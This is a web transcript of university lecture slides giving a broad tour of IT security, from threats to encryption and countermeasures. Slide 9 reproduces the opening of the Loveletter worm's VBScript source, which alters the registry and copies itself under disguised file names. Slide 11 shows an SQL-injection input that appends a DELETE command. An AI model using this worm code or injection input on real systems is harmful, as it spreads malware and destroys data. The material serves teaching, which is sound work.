© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 1 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems IT security A quick tour.

Slides:



Advertisements
Similar presentations
CLASSICAL ENCRYPTION TECHNIQUES
Advertisements

Chapter ADCS CS262/0898/V1 Chapter 1 An Introduction To Computer Security TOPICS Introduction Threats to Computer Systems –Threats, Vulnerabilities.
Chapter 10 Encryption: A Matter of Trust. Awad –Electronic Commerce 1/e © 2002 Prentice Hall 2 OBJECTIVES What is Encryption? Basic Cryptographic Algorithm.
3. Protection of Information Assets (25%)
Copyright © 2003 Pearson Education, Inc. Slide 1 Computer Systems Organization & Architecture Chapters 8-12 John D. Carpinelli.
Business Transaction Management Software for Application Coordination 1 Business Processes and Coordination. Introduction to the Business.
1 Pretty Good Privacy (PGP) Security for Electronic .
CS5038 The Electronic Society
PUBLIC KEY CRYPTOSYSTEMS Symmetric Cryptosystems 6/05/2014 | pag. 2.
1 Click here to End Presentation Software: Installation and Updates Internet Download CD release NACIS Updates.
1 Social / Ethics NCDesk Societal and Ethical Issues.
© SafeNet Confidential and Proprietary Administering SafeNet StorageSecure Smart Card Module 3: Lesson 5 SafeNet StorageSecure Storage Security Course.
ACT User Meeting June Your entitlements window Entitlements, roles and v1 security overview Problems with v1 security Tasks, jobs and v2 security.
Local Area Networks - Internetworking
PP Test Review Sections 6-1 to 6-6
TCP/IP Protocol Suite 1 Copyright © The McGraw-Hill Companies, Inc. Permission required for reproduction or display. Chapter 2 The OSI Model and the TCP/IP.
Copyright © 2012, Elsevier Inc. All rights Reserved. 1 Chapter 7 Modeling Structure with Blocks.
Adding Up In Chunks.
Information Security Management Chapter “We Have to Design It for Privacy and Security.” Copyright © 2014 Pearson Education, Inc. Publishing.
PSSA Preparation.
SESSION ID: Continuous Monitoring with the 20 Critical Security Controls SPO1-W02 Wolfgang Kandek CTO.
RefWorks: The Basics October 12, What is RefWorks? A personal bibliographic software manager –Manages citations –Creates bibliogaphies Accessible.
User Security for e-Post Applications Dr Chandana Gamage University of Moratuwa.
TCP/IP Protocol Suite 1 Chapter 18 Upon completion you will be able to: Remote Login: Telnet Understand how TELNET works Understand the role of NVT in.
Chapter 1  Introduction 1 Introduction Chapter 1  Introduction 2 The Cast of Characters  Alice and Bob are the good guys  Trudy is the bad guy 
Net security - budi rahardjo Overview of Network Security Budi Rahardjo CISCO seminar 13 March 2002.
1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.
Information Security 1 Information Security: Security Tools Jeffy Mwakalinga.
1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?
Copyright © 2015 McGraw-Hill Education. All rights reserved. No reproduction or distribution without the prior written consent of McGraw-Hill Education.
1 Protecting Your Computer Internet Annoyances (Already done in Chapter 3) Spam Pop-ups Identity theft phishing hoaxes Spyware.
19.1 Silberschatz, Galvin and Gagne ©2003 Operating System Concepts with Java Chapter 19: Security The Security Problem Authentication Program Threats.
Client/Server Computing Model of computing in which very powerful personal computers (clients) are connected in a network with one or more server computers.
8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.
8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.
8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.
Web server security Dr Jim Briggs WEBP security1.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Network Infrastructure Security. LAN Security Local area networks facilitate the storage and retrieval of programs and data used by a group of people.
E-business Security Dana Vasiloaica Institute of Technology Sligo 22 April 2006.
Lecture 12 Electronic Business (MGT-485). Recap – Lecture 11 E-Commerce Security Environment Security Threats in E-commerce Technology Solutions.
Security. If I get 7.5% interest on $5,349.44, how much do I get in a month? (.075/12) = * 5, = $ What happens to the.004? =
Internet Safety CSA September 21, Internet Threats Malware (viruses) Spyware Spam Hackers Cyber-criminals.
Networks and Security. Types of Attacks/Security Issues  Malware  Viruses  Worms  Trojan Horse  Rootkit  Phishing  Spyware  Denial of Service.
CHAPTER 3 Information Privacy and Security. CHAPTER OUTLINE  Ethical Issues in Information Systems  Threats to Information Security  Protecting Information.
ISNE101 Dr. Ken Cosh Week 14. This Week  Challenges (still) facing Modern IS  Reliability  Security.
AIS, Passwords Should not be shared Should be changed by user Should be changed frequently and upon compromise (suspected unauthorized disclosure)
Security Chapter 8 Objectives Societal impact of information and information technology –Explain the meaning of terms related to computer security and.
BUSINESS B1 Information Security.
Tutorial Chapter 5. 2 Question 1: What are some information technology tools that can affect privacy? How are these tools used to commit computer crimes?
Types of Electronic Infection
Network Security Management Dr. Robert Chi Chair and Professor, IS department Chief editor, Journal of Electronic Commerce Research.
Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them Computer Hardware and Software Maintenance.
Topic 5: Basic Security.
INFORMATION SECURITY MANAGEMENT P ROTECTION M ECHANISMS - C RYPTOGRAPHY.
Computer Security By Duncan Hall.
“Lines of Defense” against Malware.. Prevention: Keep Malware off your computer. Limit Damage: Stop Malware that gets onto your computer from doing any.
INFORMATION SECURITY MANAGEMENT P ROTECTION M ECHANISMS - C RYPTOGRAPHY.
Information Systems Design and Development Security Precautions Computing Science.
Security Protecting information data confidentiality
Unit 3 Section 6.4: Internet Security
Chapter 40 Internet Security.
USAGE OF CRYPTOGRAPHY IN NETWORK SECURITY
Secure Software Confidentiality Integrity Data Security Authentication
INFORMATION SECURITY The protection of information from accidental or intentional misuse of a persons inside or outside an organization Comp 212 – Computer.
The Security Problem Security must consider external environment of the system, and protect it from: unauthorized access. malicious modification or destruction.
Security.
Test 3 review FTP & Cybersecurity
Presentation transcript:

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 1 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems IT security A quick tour

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 2 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems The security problem is real. computer criminality recorded cases computer criminality credit card frauds Source: Bundeskriminalamt 2004,

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 3 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Registered frauds. Quelle: CERT® Coordination Center, Software Engineering Institute, Carnegie Mellon University June 2005

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 4 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Internet criminality as shooting star. Source: Bundeskriminalamt computer criminality, especially credit card fraud data and program misuse hacking, spying computer frauds computer sabotage spying program piracy dealing with illegal copies of programs Trends in computer criminality in Germany

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 5 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Overview l Overview l Some threats (some !) l Example Solutions »Authentication –Who is it ? »Encryption –Keep data confidential l What to do ?

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 6 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Data Security: DIN 44300, Part 1. l protection of data (stored or transmitted) from destruction (loss, damage, manipulation) and from misuse l privacy protection: protection of persons from detractions by processing data about this persons spying fraud nonavailability sabotage

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 7 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Security Criteria. l integrity »consistency: data not contradictionary »correctness: data correspond to reality DoS, DDoS, mail flooding l confidence »data access only by authorized persons hacking l authenticity »authentification of users »data persistence fake orders spoofing l availability »access to programs and data at any (intended) time by authorized persons spying fraud non- availability sabotage examples for security risks: computer viruses damage 2003 worldwide: 55 Billions $

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 8 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems MS Outlook Loveletter: love @

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 9 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems A simple Visual Basic program. rem barok -loveletter(vbe) rem by: spyder / Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs").... rem barok -loveletter(vbe) rem by: spyder / Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")....

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 10 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems (relatively) latest viruses. time lags between discovery and prevention of new viruses

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 11 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems similar: SQL-Injection File index.htm... $selstring = "SELECT * FROM sometable WHERE afield=$sstring'"; $conn = pg_Connect("localhost", "5432","","","somedb"); $result = pg_Exec($conn, $selstring);... File db-request.php Maier Maier; delete from sometable

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 12 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Distributed Denial-of-Service Attack (DDoS). victim attack slave installing a demon master Hack attacker problems: separating "good" from "bad" requests router misconfiguration: buggy IP packages cancel router function Intrusion Detection Systems

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 13 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Wardriving, LAN jacking: Invading mobile nets.

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 14 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Countermeasures. availabilityauthenticityconfidenceintegrity intrusion detection digital signatures encryption VPN firewall access control backup password biometry virus protection Managed Security Services

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 15 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Script Kiddies: Using of hacker tools without responsibility. Skills of attackers complexity of hacker tools source: c't 2/2002, S. 79 guessing of passwords viruses cracking of passwords intrusion into not secured system web worms

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 16 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Example: prevent unauthorizised access. l user identification »password, biometric methods, authentication methods l define user privileges »who is authorized for access on which resources l admission control, access control »firewall, Intrusion Detection Systems l encryption »acces to data is possible but use of data is not possible

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 17 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems lbrute force hack »trying out all possible combinations of characters. ldictionary hack »trying out a list of often used and well known passwords or dictionaries »hybrid attack : combine dictionary password with numbers/characters lspying out »looking over the shoulder »infiltrating a trojan horse lSocial Engineering »exploiting the naivity of persons who (dont) keep a secret »i.E.: fake mail to employees with sender spoofing ("IT security dept.") and password request »Recent study (BBC News) showed, that 92% of participating people revealed personal details like mothers maiden name, first school,... (Comm. ACM Vol. 48/6 p. 10) Password cracking.

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 18 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Default passwords

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 19 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Default passwords contd.

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 20 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Social Engineering. With Java and JavaScript it is simple to implement a trojan horse which transmits the dial up password to the hacker. a popup window, imitating the dial up window to the ISP a message box dupes a connection breakdown

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 21 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Social Engineering. original and fake

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 22 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Beispiel Telekom Phishing mail

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 23 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Biometry. hand geometry position of bones and knuckles facial recognition geometric position of eyes, nose; proportions Iris pattern around the pupil Retina vascular patterns on retina voice pattern of sound / frequency rhythm of speech handwriting speed, pressure, direction,... typing rhythm fingerprint

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 24 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems eTokens.

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 25 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Encryption Problem Data transmission over public (esp. Wireless) networks is public ! Solution Private network (expensive) or encryption: Sender applies (mathematical) function on message in a way that only (!) the receiver can recover the original sender: E = e(K,M) : K = key, M = message receiver: M = d(K,E) : E = encrypted message, works if M = d(K,e(K,M))

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 26 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems substitution chiffre Simple encryption technique: Replace every character by a different one The transformation is the key: Original alphabet: abcdefghijklmnopqrstuvwxyz Key: qfwgxbdkpjhyzstiarnouvcelm Encrypted text: q wkpbbrx kqn ot xsnurx xauqy irtfqfpypopxn btr qyy wkqrqwoxrn ot irxvxso npziyx brxauxswl fqnxg qsqylnpn q npziyx nufnopouopts pn sto nubbpwpxso qslftgl cpok q fpo tb opzx tr q wtziuoxr wqs frxqh nuwk wtgxn xqnpyl okxnx wtgxn cxrx unxg usopy okx spsxoxxsok wxsourl qsg cxrx rxiyqwxg fl wtgxn okqo wkqsdx okx nufnopouopts iqooxrs cpok xqwk wkqrqwoxr

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 27 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems cryptoanalysis Relative frequency of characters In encrypted textIn (english) text (publication) a b c d e f g h i j k l m n o p q r s t u v w x y z a b c d e f g h i j k l m n o p q r s t u v w x y z 0.002

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 28 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Decrypted text a chiffre has to ensure equal probabilities for all characters to prevent simple frequency based analysis a simple substitution is not sufficient anybody with a bit of time or a computer can break such codes easily these codes were used until the nineteenth century and were replaced by codes that change the substitution pattern with each character Experiment: Message has a length of one character Is cryptoanalysis possible ? No ! If the key has equal length as the message, encryption is unbreakable ! (One time pad)

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 29 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Enigma

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 30 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems real encrytption techniques l Complex combination of substitution and transposition »DES (old), AES (new) l Symmetric: Sender and receiver use the same key »Problem: How to transmit the key –to many partners –long key (one time pad) »Unsolved l Asymmetric: different keys »Public/Private key »Discrete mathematics: factorization of large prime numbers is difficult l Signature: one way functions

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 31 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Protection of data transmission. l encryption »access is useless for attackers l electronic certificates/signatures »authentification of communication partners l combination: Virtual Private Network (VPN) »data packages get unpacked and transmittet in a tunnel VPN-Client (i.e. firewall) VPN-Client confidence authentity

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 32 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Security measures in use antivirus software Virtual Private Networks (VPN) automatic backup personal firewalls content filtering intrusion detection systems network firewalls application irewalls Dial-Back- or secure modems Germany USA source: IT-Security 2003; Juni-Juli, 2500 Interviews with CIOs; in Percent

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 33 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Best practices that block most attacks. l Use an application layer firewall. l Automatically update your antivirus software at the gateway, server and client. l Keep all of your systems and applications updated. Hackers commonly break into a Web site through known security holes, so make sure your servers and applications are patched and up to date. l Turn off unnecessary network services. l Remove all unneeded programs. l Scan network for common backdoor services - Use intrusion detection systems, vulnerability scans, antivirus protection.

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 34 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Problems with secure systems l Easy to block most (simple) attacks l How to block qualified attackers ? l Tradeoff: security usabilitycost Problem: Bad usability can lead to bad security: restrictive password policy --> hard to remember --> people write passwords down on paper

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 35 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Clever solutions..... l Instead of passwords, ask personal questions »personal entropy »Name of your most loved pet ? »The name of Paris Hiltons dog is Tinkerbell »Her T-Mobile account was hacked l Logins are blocked after some unsuccessfull attempts (typ. 3) »You are bidding on something at ebay, you know your hardest contrahents name, try to log in with his account and some password --> his account will be blocked --> Denial of Service attack l What would happen, if ATMs would require your fingerprint ? »Maybe less frauds ? »Maybe more people will be robbed ? (See cars with engine immobilisers)

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 36 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems You can use the most advanced technology...

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 37 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Someone will find a way to break your system if he really wants...

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 38 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems You can just make his life a little harder...

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 39 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems There is no secure system l Dont trust anybody who tells you he can built an absolutely secure system: Hes either naive or lying Weakest link counts (possibly out of your control) SQL-Slammer took out 20% of ATM machines in US (costed banks tens of millions of dollars), Continental coudnt fly for 12 hours, why ? Not the servers were vulnerable, but the network connections were overloaded. l Design problems (protocols, languages,...) »not designed for todays use »Solutions are known but hard to use, example: –no stack protection in many languages –Manipulations are possible, like for example –Buffer overflows could be avoided but are often not (more work) –SQL-injection could be avoided but is often not (more work) l Programming errors (bugs) »allow exploits, patches are always late (zero day exploits) l (better) processes can help avoiding problems

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 40 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Level of security l How much security do you need ? »Analyze data, risks,... »Online weather forecast vs. Online-banking l How much security do you want ? »Usability »Cost l Methods for dealing with risks »technical »organizational (education,...) l No silver bullet l Security services are (and will be even more) good business »Communications of the ACM Vol 48/6 pp. 82

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 41 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Security conception. preconditions: security goals actual state system limits preconditions: security goals actual state system limits specification of security objects policy conception damage analysis risk analysis threat analysis updating the conception Security Policy recognising threats evaluating threats avoiding threats

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 42 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems risk estimation of the used security tools certificates, certification authorities problem: estimation of the residual risk security standards security standards A final risk remains... overall risk without security prócedures overall risk without security prócedures risk prevention firewall intrusion detection risk prevention firewall intrusion detection risk reduction education virus tools risk reduction education virus tools risk shifting insurance risk shifting insurance residual risk

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.